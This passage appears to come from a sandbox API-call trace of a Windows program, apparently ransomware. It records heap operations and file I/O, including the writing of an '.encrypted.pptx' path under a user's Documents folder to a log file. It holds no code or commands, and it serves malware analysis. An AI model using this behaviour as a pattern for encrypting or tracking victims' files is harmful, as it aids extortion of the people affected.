lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.270] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.270] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1db7, lpOverlapped=0x0) returned 1 [0036.271] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.271] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1db7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.271] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.encrypted.pptx\r\n", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0036.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5a) returned 0x87a9d8 [0036.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.encrypted.pptx\r\n", cchWideChar=90, lpMultiByteStr=0x87a9d8, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\JIof8cjEeKxRyV.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 90 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0036.271] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x59, lpOverlapped=0x0) returned 1 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.272] CloseHandle (hObject=0x140) returned 1 [0036.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.273] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.273] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.274] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.274] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0036.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.275] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.278] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.279] RtlAllocateHeap 